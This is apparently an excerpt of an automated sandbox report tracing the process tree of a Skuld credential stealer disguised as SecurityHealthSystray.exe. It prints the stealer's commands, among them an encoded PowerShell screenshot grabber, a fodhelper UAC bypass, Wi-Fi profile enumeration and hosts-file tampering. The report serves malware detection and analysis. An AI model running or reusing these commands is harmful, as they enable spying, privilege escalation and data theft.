                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:50
                                                                                                                                                                                                                                Start time:05:21:28
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                                Imagebase:0x7ff6156b0000
                                                                                                                                                                                                                                File size:77'312 bytes
                                                                                                                                                                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:51
                                                                                                                                                                                                                                Start time:05:21:28
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:52
                                                                                                                                                                                                                                Start time:05:21:28
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:netsh wlan show profile
                                                                                                                                                                                                                                Imagebase:0x7ff792750000
                                                                                                                                                                                                                                File size:96'768 bytes
                                                                                                                                                                                                                                MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:54
                                                                                                                                                                                                                                Start time:05:21:30
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                                                                                                                                                                                                                                Imagebase:0xbe0000
                                                                                                                                                                                                                                File size:10'375'680 bytes
                                                                                                                                                                                                                                MD5 hash:DBBD2127D1030E4C9548FDF7DE9983A7
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000036.00000000.1632827829.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000036.00000000.1632827829.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:55
                                                                                                                                                                                                                                Start time:05:21:30
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:56
                                                                                                                                                                                                                                Start time:05:21:31
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:cmd.exe /C fodhelper
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:57
                                                                                                                                                                                                                                Start time:05:21:31
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\fodhelper.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:fodhelper
                                                                                                                                                                                                                                Imagebase:0x7ff6cc440000
                                                                                                                                                                                                                                File size:49'664 bytes
                                                                                                                                                                                                                                MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:58
                                                                                                                                                                                                                                Start time:05:21:32
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\fodhelper.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\fodhelper.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6cc440000
                                                                                                                                                                                                                                File size:49'664 bytes
                                                                                                                                                                                                                                MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:59
                                                                                                                                                                                                                                Start time:05:21:32
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\consent.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:consent.exe 6092 324 0000019985E22B80
                                                                                                                                                                                                                                Imagebase:0x7ff7bdcd0000
                                                                                                                                                                                                                                File size:186'704 bytes
                                                                                                                                                                                                                                MD5 hash:DD5032EF160209E470E2612A8A3D5F59
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:60
                                                                                                                                                                                                                                Start time:05:21:33
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:61
                                                                                                                                                                                                                                Start time:05:21:33
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"
                                                                                                                                                                                                                                Imagebase:0x7ff714350000
                                                                                                                                                                                                                                File size:2'759'232 bytes
                                                                                                                                                                                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:62
                                                                                                                                                                                                                                Start time:05:21:33
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\3pyiazzo\CSC68A32BD75EFB4A1F8C11C6C63FDD8E5.TMP"
                                                                                                                                                                                                                                Imagebase:0x7ff7addb0000
                                                                                                                                                                                                                                File size:52'744 bytes
                                                                                                                                                                                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:63
                                                                                                                                                                                                                                Start time:05:21:34
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\fodhelper.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\fodhelper.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6cc440000
                                                                                                                                                                                                                                File size:49'664 bytes
                                                                                                                                                                                                                                MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:65
                                                                                                                                                                                                                                Start time:05:21:34
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:66
                                                                                                                                                                                                                                Start time:05:21:34
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:67
                                                                                                                                                                                                                                Start time:05:21:34
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:68
                                                                                                                                                                                                                                Start time:05:21:34
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:69
                                                                                                                                                                                                                                Start time:05:21:34
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:70
                                                                                                                                                                                                                                Start time:05:21:34
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:71
                                                                                                                                                                                                                                Start time:05:21:34
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:getmac
                                                                                                                                                                                                                                Imagebase:0x7ff6ba8f0000
                                                                                                                                                                                                                                File size:90'112 bytes
                                                                                                                                                                                                                                MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:72
                                                                                                                                                                                                                                Start time:05:21:34
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tree /A /F
                                                                                                                                                                                                                                Imagebase:0x7ff70e8b0000
                                                                                                                                                                                                                                File size:20'992 bytes
                                                                                                                                                                                                                                MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:73
                                                                                                                                                                                                                                Start time:05:21:35
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                Imagebase:0x7ff7cb090000
                                                                                                                                                                                                                                File size:23'040 bytes
                                                                                                                                                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:74
                                                                                                                                                                                                                                Start time:05:21:35
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                                                                                                                                                                                                                                Imagebase:0xbe0000
                                                                                                                                                                                                                                File size:10'375'680 bytes
                                                                                                                                                                                                                                MD5 hash:DBBD2127D1030E4C9548FDF7DE9983A7
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000004A.00000002.1701196379.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 0000004A.00000002.1701196379.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:75
                                                                                                                                                                                                                                Start time:05:21:35
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:76
                                                                                                                                                                                                                                Start time:05:21:35
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:77
                                                                                                                                                                                                                                Start time:05:21:35
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
